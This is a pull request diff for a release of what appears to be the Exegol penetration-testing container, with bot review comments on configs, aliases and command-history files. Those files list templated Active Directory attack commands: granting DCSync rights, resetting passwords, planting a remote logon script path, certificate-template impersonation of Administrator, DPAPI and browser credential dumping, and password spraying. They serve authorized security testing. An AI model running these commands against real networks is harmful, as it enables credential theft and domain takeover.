Merge pull request #331 from ThePorgs/dev
Release 3.1.3
Showing
59 changed files
with
767 additions
and
343 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
{ | ||
"version": 1, | ||
"bind_addr": "localhost:1030", | ||
"metrics_port": ":2112", | ||
"root_url": "http://localhost:1030/", | ||
"work_dir": "/opt/tools/BloodHound-CE/work", | ||
"log_level": "INFO", | ||
"log_path": "bloodhound.log", | ||
"features": { | ||
"enable_auth": true | ||
}, | ||
"tls": { | ||
"cert_file": "", | ||
"key_file": "" | ||
}, | ||
"database": { | ||
"connection": "user=bloodhound password=exegol4thewin dbname=bloodhound host=localhost" | ||
}, | ||
"neo4j": { | ||
"connection": "neo4j://neo4j:exegol4thewin@localhost:7687/" | ||
}, | ||
"collectors_base_path": "/opt/tools/BloodHound-CE/collectors" | ||
} |
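Review bot: The `database.connection` and `neo4j.connection` strings carry the same static password in a config file that ships identically in every image, so anyone who can reach PostgreSQL or Neo4j in a running container already knows the credential. Whether those services listen beyond localhost is not visible in this hunk; if the container can share the host's network namespace, the password should be generated at first start and written into this file rather than committed. Separately, `"metrics_port": ":2112"` has no host part and so presumably listens on all interfaces while `bind_addr` is restricted to localhost; if the server accepts a host:port value there, `"metrics_port": "127.0.0.1:2112"` keeps the metrics endpoint local as well. `root_url` is plain HTTP with empty `tls` fields, which is acceptable only while the listener stays on loopback.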
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,12 @@ | ||
[exegol_provider] | ||
default = default_sect | ||
legacy = legacy_sect | ||
|
||
[openssl_init] | ||
providers = exegol_provider | ||
|
||
[default_sect] | ||
activate = 1 | ||
|
||
[legacy_sect] | ||
activate = 1 |
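Review bot: `[legacy_sect]` with `activate = 1` turns on the OpenSSL legacy provider for every program in the image that loads this configuration, which re-enables algorithms OpenSSL 3 no longer offers by default (MD4, RC4, single DES and others), and the file gives no reason for it. A comment above `[legacy_sect]` such as `# legacy provider is needed by tools that still rely on MD4/RC4; this weakens the defaults for all OpenSSL consumers in the image` would record the trade-off; the stated motive is my assumption and should be confirmed by the author. The sections also take effect only if the main section sets `openssl_conf = openssl_init`, which is not visible in this hunk.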
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
# most common dependencies, found with the following commands | ||
# 1. for pipx: | ||
# find ~/.local/share/pipx/ -type d -name "bin" 2>/dev/null | while read venv_path; do venv_bin="${venv_path}/python"; if [[ -x "$venv_bin" ]]; then suffix=$(printf "%04d" $((suffix+1))); "$venv_bin" -m pip list > "/tmp/pipxlibs${suffix}.txt"; fi; done | ||
# 2. for /opt/tools: | ||
# find /opt/tools ~/.local/share/pipx/ -type d -name "venv" 2>/dev/null | while read venv_path; do venv_bin="${venv_path}/bin/python"; if [[ -x "$venv_bin" ]]; then suffix=$(printf "%04d" $((suffix+1))); "$venv_bin" -m pip list > "/tmp/piplibs${suffix}.txt"; fi; done | ||
# 3. compare | ||
# awk 'FNR > 2 {print $1}' /tmp/piplibs*.txt /tmp/pipxlibs*.txt | sort | uniq -c | sort -nr | ||
|
||
# The impacket package cannot be added here as it will conflict with install_impacket | ||
|
||
setuptools | ||
pip | ||
charset-normalizer | ||
six | ||
certifi | ||
idna | ||
urllib3 | ||
requests | ||
pycparser | ||
cffi | ||
click | ||
cryptography | ||
MarkupSafe | ||
Jinja2 | ||
pyasn1 | ||
dnspython | ||
Werkzeug | ||
pyOpenSSL | ||
itsdangerous | ||
Flask | ||
pycryptodomex | ||
ldap3 | ||
blinker | ||
future | ||
ldapdomaindump | ||
pandas |
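Review bot: Every package in this list is unpinned, so each image build resolves whatever release is newest on the index at that moment; builds are not reproducible, and a bad or compromised upload of any of these widely shared libraries reaches every tool served from this set. Pinning versions, for example through a constraints file passed with `pip install -c`, or more strictly hash-checked requirements with `--require-hashes`, would make the set auditable. How this file is consumed is not visible in the hunk, so the exact mechanism is for the author to choose.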
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,2 @@ | ||
alias BurpSuiteCommunity='java -jar -Xmx4g /opt/tools/BurpSuiteCommunity/BurpSuiteCommunity.jar' | ||
alias BurpSuiteCommunity='/usr/lib/jvm/java-21-openjdk/bin/java -jar -Xmx4g /opt/tools/BurpSuiteCommunity/BurpSuiteCommunity.jar' | ||
alias burpsuite=BurpSuiteCommunity |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
alias evil-winrm='/usr/local/rvm/gems/ruby-3.2.2@evil-winrm/wrappers/ruby /usr/local/rvm/gems/ruby-3.2.2@evil-winrm/bin/evil-winrm' | ||
alias evil-winrm='/usr/local/rvm/gems/ruby-3.1.2@evil-winrm/wrappers/ruby /usr/local/rvm/gems/ruby-3.1.2@evil-winrm/bin/evil-winrm' |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
alias ExtractBitlockerKeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/ExtractBitlockerKeys.py" | ||
alias ExtractBitlockerKeys.py="/opt/tools/ExtractBitlockerKeys/venv/bin/python3 /opt/tools/ExtractBitlockerKeys/python/ExtractBitlockerKeys.py" |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
alias sccmhunter.py='/opt/tools/sccmhunter/venv/bin/python3 /opt/tools/sccmhunter/sccmhunter.py' |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
alias sccmwtf.py='/opt/tools/sccmwtf/venv/bin/python3 /opt/tools/sccmwtf/sccmwtf.py' |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
alias ysoserial='JAVA_HOME=/usr/lib/jvm/java-11-openjdk java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar /opt/tools/ysoserial/ysoserial.jar' | ||
alias ysoserial='/usr/lib/jvm/java-11-openjdk/bin/java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens=java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar /opt/tools/ysoserial/ysoserial.jar' |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,4 @@ | ||
abuseACL "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" | ||
abuseACL -hashes "$USER_NTHASH" -extends "$DOMAIN"/"$USER" | ||
abuseACL -hashes "$NT_HASH" -extends "$DOMAIN"/"$USER" | ||
abuseACL -k -principal "$PRINCIPAL" -extends "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" | ||
abuseACL -principalsfile ./principalsfile "$DOMAIN"/"$USER":"$PASSWORD"@"$TARGET" |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME serviceprincipalname | ||
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP set object $COMPUTER_NAME dnsHostName -v '$DC_NAME.$DOMAIN' | ||
bloodyAD -d $DOMAIN -u $USER -p $PASSWORD --host $DC_IP get object $COMPUTER_NAME --attr dnsHostName,serviceprincipalname | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user msTSInitialProgram -v '\\1.2.3.4\share\file.exe' | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user msTSWorkDirectory -v 'C:\' | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object vulnerable_user scriptPath -v '\\1.2.3.4\share\file.exe' | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set owner $TargetObject $ControlledPrincipal | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get dnsDump | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember $TargetGroup $TargetUser | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-RevealOnDemandGroup -v 'CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local' -v 'CN=Administrator,CN=Users,DC=domain,DC=local' | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set object 'RODC-server$' --attr msDS-NeverRevealGroup | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password $TargetUser $NewPassword | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add genericAll $TargetObject $ControlledPrincipal | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add dcsync $ControlledPrincipal | ||
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get object $TargetObject --attr msDS-ManagedPassword |
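Review bot: The first three entries expand `$DOMAIN`, `$USER`, `$PASSWORD`, `$DC_IP` and `$COMPUTER_NAME` unquoted while the remaining thirteen quote the connection variables; an unquoted value containing whitespace or glob characters is split or expanded by the shell before the program sees it. They should follow the form used by the rest of the file, `--host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD"`. In the second entry `-v '$DC_NAME.$DOMAIN'` is single-quoted, so the shell passes that text literally rather than the variables' values; double quotes are needed if expansion is intended. `$TargetObject`, `$ControlledPrincipal`, `$TargetGroup`, `$TargetUser` and `$NewPassword` are also unquoted and use a different naming style from the upper-case variables in the other entries.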
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,4 +1,4 @@ | ||
certipy find -enabled -u "$USER@$DOMAIN" -p "$PASSWORD" -old-bloodhound | ||
certipy req -username "$USER@$DOMAIN" -p "$PASSWORD" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN" | ||
certipy req -username "$USER@$DOMAIN" -hashes "$USER_NTHASH" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN" | ||
certipy req -username "$USER@$DOMAIN" -hashes "$NT_HASH" -ca "$CA_NAME" -target "$CA_FQDN" -template "$ESC1_TEMPLATE_NAME" -upn "Administrator@$DOMAIN" | ||
certipy relay -ca "$CA_FQDN" -template "$ESC8_TEMPLATE_NAME" |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
dploot machinecertificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -quiet | ||
dploot backupkey -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -quiet | ||
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk -quiet | ||
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile /data/masterkeys | ||
dploot masterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot masterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -passwords passwords | ||
dploot credentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot credentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot vaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot vaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot rdg -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot rdg -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot certificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -mkfile file.mkf | ||
dploot browser -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk | ||
dploot machinemasterkeys -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot machinecredentials -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot machinevaults -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot machinecertificates -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot wifi -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot sccm -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot backupkey -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" | ||
dploot mobaxterm -d "$DOMAIN" -u "$USER" -p "$PASSWORD" "$DC_IP" -pvk key.pvk |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,3 +1,5 @@ | ||
kerbrute userenum -d "$DOMAIN" usernames.txt | ||
kerbrute passwordspray -d "$DOMAIN" domain_users.txt Password123 | ||
kerbrute bruteuser -d "$DOMAIN" passwords.lst thoffman | ||
kerbrute userenum --domain "$DOMAIN" usernames.txt | ||
kerbrute passwordspray --domain "$DOMAIN" domain_users.txt Password123 | ||
kerbrute passwordspray --user-as-pass --domain "$DOMAIN" domain_users.txt | ||
kerbrute bruteuser --domain "$DOMAIN" passwords.lst thoffman | ||
kerbrute bruteforce --domain "$DOMAIN" user_password.lst |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
pretender -i "$INTERFACE" --dry | ||
pretender -i "$INTERFACE" --dry --no-ra | ||
pretender -i "$INTERFACE" --dry --no-ra-dns | ||
pretender -i "$INTERFACE" --spoof "$DOMAIN" | ||
|
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
sccmhunter.py admin -u "$USER" -p "$PASSWORD" -ip "$TARGET" | ||
sccmhunter.py find -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" | ||
sccmhunter.py smb -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" -save | ||
sccmhunter.py http -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -dc-ip "$DC_IP" -auto | ||
sccmhunter.py http -u "$USER" -p "$PASSWORD" -d "$DOMAIN" -cn "$COMPUTER_NAME" -cp "$COMPUTER_PASSWORD" -dc-ip "$DC_IP" | ||
sccmhunter.py admin -u "$USERNAME" -p ":$NT_HASH" -ip "$TARGET" | ||
sccmhunter.py show -smb | ||
sccmhunter.py show -user | ||
sccmhunter.py show -computers | ||
sccmhunter.py show -all |
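Review bot: The sixth entry uses `"$USERNAME"` where every other entry in this file uses `"$USER"`; depending on what the shell environment defines, that line may expand to an empty value or to an account other than the one the rest of the file refers to. For consistency it should read `sccmhunter.py admin -u "$USER" -p ":$NT_HASH" -ip "$TARGET"`.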
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
sccmwtf.py fakepc "fakepc.$DOMAIN" "$SCCM_MP_NetBiosName" "$DOMAIN\controlledComputer$" "controlledPassword" |